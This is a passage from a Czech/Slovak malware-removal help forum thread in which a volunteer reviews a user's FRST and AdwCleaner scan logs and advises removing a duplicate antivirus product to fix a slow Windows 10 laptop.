uživateli NT-AUTORITÄT\Lokaler Dienst (SID: S-1-5-19) z adresy LocalHost (unter Verwendung von LRPC) běžící v kontejneru aplikací Nicht verfügbar – SID (Nicht verfügbar). Toto oprávnění zabezpečení lze změnit pomocí nástroje správy Služba komponent.


CodeIntegrity:
===================================

Date: 2018-10-08 14:02:50.158
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\browser_broker.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVAST Software\Avast\ashShA64.dll that did not meet the Microsoft signing level requirements.

Date: 2018-10-08 14:01:23.351
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\browser_broker.exe) attempted to load \Device\HarddiskVolume2\Program Files\Google\Drive\googledrivesync64.dll that did not meet the Microsoft signing level requirements.

Date: 2018-10-08 14:01:23.007
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\browser_broker.exe) attempted to load \Device\HarddiskVolume2\Program Files\Google\Drive\googledrivesync64.dll that did not meet the Microsoft signing level requirements.

Date: 2018-10-08 14:01:22.762
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\browser_broker.exe) attempted to load \Device\HarddiskVolume2\Program Files\Google\Drive\googledrivesync64.dll that did not meet the Microsoft signing level requirements.

Date: 2018-09-24 18:18:14.971
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\browser_broker.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVAST Software\Avast\ashShA64.dll that did not meet the Microsoft signing level requirements.

Date: 2018-09-24 18:18:12.119
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\browser_broker.exe) attempted to load \Device\HarddiskVolume2\Program Files\Google\Drive\googledrivesync64.dll that did not meet the Microsoft signing level requirements.

Date: 2018-09-24 18:18:12.056
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\browser_broker.exe) attempted to load \Device\HarddiskVolume2\Program Files\Google\Drive\googledrivesync64.dll that did not meet the Microsoft signing level requirements.

Date: 2018-09-24 18:18:11.969
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\browser_broker.exe) attempted to load \Device\HarddiskVolume2\Program Files\Google\Drive\googledrivesync64.dll that did not meet the Microsoft signing level requirements.

==================== Speicherinformationen ===========================

Prozessor: AMD A10-5750M APU with Radeon(tm) HD Graphics
Prozentuale Nutzung des RAM: 75%
Installierter physikalischer RAM: 3287.36 MB
Verfügbarer physikalischer RAM: 819.48 MB
Summe virtueller Speicher: 5719.36 MB
Verfügbarer virtueller Speicher: 1392.28 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:930.32 GB) (Free:633.11 GB) NTFS

\\?\Volume{78df0578-0000-0000-0000-100000000000}\ (System-reserviert) (Fixed) (Total:0.34 GB) (Free:0.08 GB) NTFS
\\?\Volume{78df0578-0000-0000-0000-20aae8000000}\ () (Fixed) (Total:0.85 GB) (Free:0.45 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 78DF0578)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=930.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=874 MB) - (Type=27)

==================== Ende von Addition.txt ============================

Conder
VIP
VIP
Příspěvky: 4399
Registrován: 30 pro 2013 22:29
Bydliště: Bratislava

Re: Prosim o kontrolu logu. Velice dlouha odezva

#2 Příspěvek od Conder »

Ahoj :)

:arrow: V PC bezia 2 antivirusy (Avast a McAfee), jeden z nich odinstaluj. Osobne by som odporucil odinstalovat McAfee a ponechat Avast.

:arrow: Stiahni AdwCleaner: https://toolslib.net/downloads/finish/1/
  • Uloz na plochu a ukonci vsetky programy
  • Spusti AdwCleaner ako spravca
  • Odsuhlas licencne podmienky
  • Klikni na Skenovat nyni (Scan now) a pockaj na dokoncenie
  • Nechaj zaskrtnute vsetky nalezy
  • Klikni na Cisteni a opravy (Clean and Repair) a potvrd restart PC teraz
  • Po restartovani PC sa otvori AdwCleaner, klikni na Zobrazit soubor protokolu
  • Otvori sa log, jeho obsah sem skopiruj
Absolvent skoly pre novacikov :)
E-mail: conder (zavinac) forum.viry.cz

Ak nieco nie je jasne, pytaj sa. Odporucam mat vzdy zalohovat dolezite data (dokumenty, fotky a ine).

Fixlisty a ine scripty su pisane len pre konkretny PC. Nepouzivajte ich na inych zariadeniach, inak hrozi poskodenie systemu alebo strata dat.
Ak mate podobny problem ako iny uzivatel, prosim, zalozte si vlastnu temu.

V pripade spokojnosti je mozne podporit forum. Dakujeme!

lkcenovsky
Návštěvník
Návštěvník
Příspěvky: 5
Registrován: 11 lis 2018 22:41

Re: Prosim o kontrolu logu. Velice dlouha odezva

#3 Příspěvek od lkcenovsky »

Ahoj,
dekuji. Na ty dva antiviri jsem uz prisel kdyz jsem procital jina vlakna.

Log z ADW Cleaner:


-------------------------------
# Malwarebytes AdwCleaner 7.2.4.0
# -------------------------------
# Build: 09-25-2018
# Database: 2018-11-05.1 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 11-12-2018
# Duration: 00:00:04
# OS: Windows 10 Home
# Cleaned: 8
# Failed: 0


***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

Deleted C:\Program Files\WinZip Driver Updater

***** [ Files ] *****

No malicious files cleaned.

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks cleaned.

***** [ Registry ] *****

Deleted HKCU\Software\csastats
Deleted HKCU\Software\PRODUCTSETUP
Deleted HKCU\Software\Microsoft\Internet Explorer\DOMStorage\cdn.castplatform.com
Deleted HKCU\Software\Microsoft\Internet Explorer\DOMStorage\castplatform.com
Deleted HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|VLC Updater
Deleted HKCU\Software\AM|VLC Updater

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

Deleted Websuche

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [1772 octets] - [12/11/2018 17:12:02]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########

Conder
VIP
VIP
Příspěvky: 4399
Registrován: 30 pro 2013 22:29
Bydliště: Bratislava

Re: Prosim o kontrolu logu. Velice dlouha odezva

#4 Příspěvek od Conder »

:arrow: OK, ak si odinstaloval McAfee, tak to precisti este cez McAfee odinstalator: http://us.mcafee.com/apps/supporttools/mcpr/mcpr.asp

:arrow: Nasledne poprosim o obidva nove logy z FRST. Pred spustenim FRST ho premenuj na "EnglishFRST64.exe", cim sa vynuti vygenerovanie logu v anglictine.
Absolvent skoly pre novacikov :)
E-mail: conder (zavinac) forum.viry.cz

Ak nieco nie je jasne, pytaj sa. Odporucam mat vzdy zalohovat dolezite data (dokumenty, fotky a ine).

Fixlisty a ine scripty su pisane len pre konkretny PC. Nepouzivajte ich na inych zariadeniach, inak hrozi poskodenie systemu alebo strata dat.
Ak mate podobny problem ako iny uzivatel, prosim, zalozte si vlastnu temu.

V pripade spokojnosti je mozne podporit forum. Dakujeme!

lkcenovsky
Návštěvník
Návštěvník
Příspěvky: 5
Registrován: 11 lis 2018 22:41

Re: Prosim o kontrolu logu. Velice dlouha odezva

#5 Příspěvek od lkcenovsky »

Diky. Zde jsou logy:

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 11.11.2018
Ran by User (administrator) on DESKTOP-A1GGGIV (13-11-2018 22:08:23)
Running from C:\Users\User\Downloads
Loaded Profiles: User (Available Profiles: User)
Platform: Windows 10 Home Version 1803 17134.345 (X64) Language: Němčina (Německo)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDService.exe
(Conexant Systems Inc.) C:\Windows\System32\CxAudMsg64.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrlHelper.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.17\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.17\GoogleCrashHandler64.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.10314.31700.1000_x64__8wekyb3d8bbwe\Office16\OfficeHubTaskHost.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.34.81.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11001.20083.0_x64__8wekyb3d8bbwe\HxTsr.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Conexant Systems, Inc.) C:\Program Files\CONEXANT\cAudioFilterAgent\CAudioFilterAgent64.exe
(Realtek semiconductor) C:\Windows\RTFTrack.exe
() C:\Program Files\Google\Drive\googledrivesync.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.34.81.0_x64__kzf8qxf38zg5c\SkypeApp.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Farbar) C:\Users\User\Downloads\englishFRST64.exe
() C:\Program Files\Google\Drive\googledrivesync.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-12] (Microsoft Corporation)
HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [3242696 2016-09-07] (ELAN Microelectronics Corp.)
HKLM\...\Run: [cAudioFilterAgent] => C:\Program Files\Conexant\cAudioFilterAgent\cAudioFilterAgent64.exe [935104 2014-11-25] (Conexant Systems, Inc.)
HKLM\...\Run: [RtsFT] => C:\WINDOWS\RTFTrack.exe [9309936 2016-09-07] (Realtek semiconductor)
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [242392 2018-10-24] (AVAST Software)
HKLM\...\Run: [SmartAudio] => C:\Program Files\CONEXANT\SAII\SACpl.exe [1830616 2014-04-10] (Conexant Systems, Inc.)
HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-12] (Microsoft Corporation)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [601424 2018-07-07] (Oracle Corporation)
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== ATTENTION
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Corporation)
HKU\S-1-5-21-3294147820-2580206503-2443620995-1001\...\Run: [GoogleDriveSync] => C:\Program Files\Google\Drive\googledrivesync.exe [46459080 2018-10-04] ()
GroupPolicy: Restriction ? <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{cad39d53-d09b-4d1d-a27e-f6fce36c5a7a}: [DhcpNameServer] 192.168.178.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-3294147820-2580206503-2443620995-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05 ... earchTerms}
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05 ... earchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05 ... earchTerms}
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05 ... earchTerms}
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_181\bin\ssv.dll [2018-08-18] (Oracle Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_181\bin\jp2ssv.dll [2018-08-18] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_181\bin\ssv.dll [2018-08-18] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_181\bin\jp2ssv.dll [2018-08-18] (Oracle Corporation)

FireFox:
========
FF DefaultProfile: fv1h6kzk.default
FF ProfilePath: C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\fv1h6kzk.default [2018-11-12]
FF Homepage: Mozilla\Firefox\Profiles\fv1h6kzk.default -> hxxp://www.bing.com/search?FORM=INCOH1&PC=IC04 ... O-5c39e9ad
FF NewTab: Mozilla\Firefox\Profiles\fv1h6kzk.default -> about:newtab
FF SearchPlugin: C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\fv1h6kzk.default\searchplugins\bing powered search.xml [2016-09-13]
FF Plugin: @java.com/DTPlugin,version=11.181.2 -> C:\Program Files\Java\jre1.8.0_181\bin\dtplugin\npDeployJava1.dll [2018-08-18] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.181.2 -> C:\Program Files\Java\jre1.8.0_181\bin\plugin2\npjp2.dll [2018-08-18] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50428.0\npctrl.dll [2016-04-27] ( Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [No File]
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\WINDOWS\SysWOW64\Adobe\Director\np32dsw_1234204.dll [2018-06-06] (Adobe Systems, Inc.)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll [2015-10-13] (Google, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=11.181.2 -> C:\Program Files (x86)\Java\jre1.8.0_181\bin\dtplugin\npDeployJava1.dll [2018-08-18] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.181.2 -> C:\Program Files (x86)\Java\jre1.8.0_181\bin\plugin2\npjp2.dll [2018-08-18] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50428.0\npctrl.dll [2016-04-27] ( Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll [2018-06-18] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll [2018-06-18] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2018-05-29] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2018-05-29] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-09-20] (Adobe Systems Inc.)

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\User\AppData\Local\Google\Chrome\User Data\Default [2018-11-13]
CHR Extension: (Prezentace) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-10-12]
CHR Extension: (Dokumenty) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-12]
CHR Extension: (Disk Google) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-09-07]
CHR Extension: (YouTube) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-09-07]
CHR Extension: (Adobe Acrobat) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2017-08-17]
CHR Extension: (Tabulky) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-10-12]
CHR Extension: (Dokumenty Google offline) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-21]
CHR Extension: (Application Launcher for Drive (by Google)) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2018-08-18]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-17]
CHR Extension: (Gmail) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-09-07]
CHR Extension: (Chrome Media Router) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-10-20]
CHR Profile: C:\Users\User\AppData\Local\Google\Chrome\User Data\Guest Profile [2018-10-28]
CHR Profile: C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 1 [2018-10-28]
CHR Extension: (Application Launcher for Drive (by Google)) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2018-10-28]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-10-28]
CHR Extension: (Chrome Media Router) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-10-28]
CHR Profile: C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 2 [2018-10-28]
CHR Extension: (Prezentace) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-10-28]
CHR Extension: (Dokumenty) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aohghmighlieiainnegkcijnfilokake [2018-10-28]
CHR Extension: (Disk Google) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-28]
CHR Extension: (YouTube) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-10-28]
CHR Extension: (Adobe Acrobat) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2018-10-28]
CHR Extension: (Tabulky) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-10-28]
CHR Extension: (McAfee® WebAdvisor) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2018-10-28]
CHR Extension: (Dokumenty Google offline) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-10-28]
CHR Extension: (Application Launcher for Drive (by Google)) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2018-10-28]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-10-28]
CHR Extension: (Gmail) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-10-28]
CHR Extension: (Chrome Media Router) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-10-28]
CHR Profile: C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 3 [2018-10-28]
CHR Extension: (Prezentace) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-10-28]
CHR Extension: (Docs) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\aohghmighlieiainnegkcijnfilokake [2018-10-28]
CHR Extension: (Disk Google) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-28]
CHR Extension: (YouTube) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-10-28]
CHR Extension: (Adobe Acrobat) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2018-10-28]
CHR Extension: (Tabulky) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-10-28]
CHR Extension: (McAfee® WebAdvisor) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2018-10-28]
CHR Extension: (Application Launcher for Drive (by Google)) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2018-10-28]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-10-28]
CHR Extension: (Gmail) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-10-28]
CHR Extension: (Chrome Media Router) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-10-28]
CHR Profile: C:\Users\User\AppData\Local\Google\Chrome\User Data\System Profile [2018-10-28]
CHR HKU\S-1-5-21-3294147820-2580206503-2443620995-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [apdfllckaahabafndbhieahigkjlhalf] - C:\Users\User\AppData\Local\Google\Drive\user_default\apdfllckaahabafndbhieahigkjlhalf_live.crx [2018-10-28]
CHR HKU\S-1-5-21-3294147820-2580206503-2443620995-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-3294147820-2580206503-2443620995-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S2 0322801542040262mcinstcleanup; C:\Users\User\AppData\Local\Temp\032280~1.EXE [999400 2018-06-06] (McAfee, Inc.) <==== ATTENTION
R3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [8188768 2018-10-24] (AVAST Software)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [325024 2018-10-24] (AVAST Software)
S3 AvastWscReporter; C:\Program Files\AVAST Software\Avast\wsc_proxy.exe [57504 2018-10-24] (AVAST Software)
R2 ETDService; C:\Program Files\Elantech\ETDService.exe [144072 2016-09-07] (ELAN Microelectronics Corp.)
S4 ssh-agent; C:\WINDOWS\System32\OpenSSH\ssh-agent.exe [495616 2018-03-10] ()
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [4451616 2018-04-12] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [107136 2018-09-21] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R0 amdkmpfd; C:\WINDOWS\System32\drivers\amdkmpfd.sys [82704 2016-09-07] (Advanced Micro Devices, Inc.)
R1 aswArPot; C:\WINDOWS\System32\drivers\aswArPot.sys [201408 2018-10-24] (AVAST Software)
R1 aswbidsdriver; C:\WINDOWS\System32\drivers\aswbidsdrivera.sys [230512 2018-10-24] (AVAST Software)
R0 aswbidsh; C:\WINDOWS\System32\drivers\aswbidsha.sys [201928 2018-10-24] (AVAST Software)
R0 aswblog; C:\WINDOWS\System32\drivers\aswbloga.sys [346760 2018-10-24] (AVAST Software)
R0 aswbuniv; C:\WINDOWS\System32\drivers\aswbuniva.sys [59664 2018-10-24] (AVAST Software)
R0 aswElam; C:\WINDOWS\System32\drivers\aswElam.sys [15360 2018-08-17] (AVAST Software)
R1 aswHdsKe; C:\WINDOWS\System32\drivers\aswHdsKe.sys [185240 2018-10-24] (AVAST Software)
S3 aswHwid; C:\WINDOWS\System32\drivers\aswHwid.sys [47064 2018-10-24] (AVAST Software)
R1 aswKbd; C:\WINDOWS\System32\drivers\aswKbd.sys [42456 2018-10-24] (AVAST Software)
R2 aswMonFlt; C:\WINDOWS\System32\drivers\aswMonFlt.sys [163376 2018-10-24] (AVAST Software)
R1 aswRdr; C:\WINDOWS\System32\drivers\aswRdr2.sys [111968 2018-10-24] (AVAST Software)
R0 aswRvrt; C:\WINDOWS\System32\drivers\aswRvrt.sys [88112 2018-10-24] (AVAST Software)
R1 aswSnx; C:\WINDOWS\System32\drivers\aswSnx.sys [1028840 2018-10-24] (AVAST Software)
R1 aswSP; C:\WINDOWS\System32\drivers\aswSP.sys [467904 2018-10-24] (AVAST Software)
R2 aswStm; C:\WINDOWS\System32\drivers\aswStm.sys [208640 2018-10-24] (AVAST Software)
R0 aswVmm; C:\WINDOWS\System32\drivers\aswVmm.sys [381144 2018-10-24] (AVAST Software)
R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [111120 2016-09-07] (Advanced Micro Devices)
S3 pelmouse; C:\WINDOWS\system32\DRIVERS\pelmouse.sys [23040 2015-12-17] (TPMX Electronics Ltd.)
S3 pelusblf; C:\WINDOWS\system32\DRIVERS\pelusblf.sys [35328 2016-01-14] (TPMX Electronics Ltd.)
S3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [410880 2016-09-07] (Realsil Semiconductor Corporation)
R3 rtsuvc; C:\WINDOWS\system32\DRIVERS\rtsuvc.sys [3059440 2016-09-07] (Realtek Semiconductor Corp.)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44616 2018-04-12] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [331680 2018-04-12] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [44032 2018-04-12] (Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-11-13 22:08 - 2018-11-13 22:11 - 000019517 _____ C:\Users\User\Downloads\FRST.txt
2018-11-13 21:25 - 2018-11-13 21:25 - 010597096 _____ (McAfee, Inc.) C:\Users\User\Downloads\MCPR.exe
2018-11-12 19:34 - 2018-11-12 19:34 - 001867936 _____ C:\Users\User\Downloads\brezen (1).zip
2018-11-12 17:34 - 2018-11-12 18:07 - 356863084 _____ C:\Users\User\Downloads\Balada o pilotovi-CZ-2018.mp4
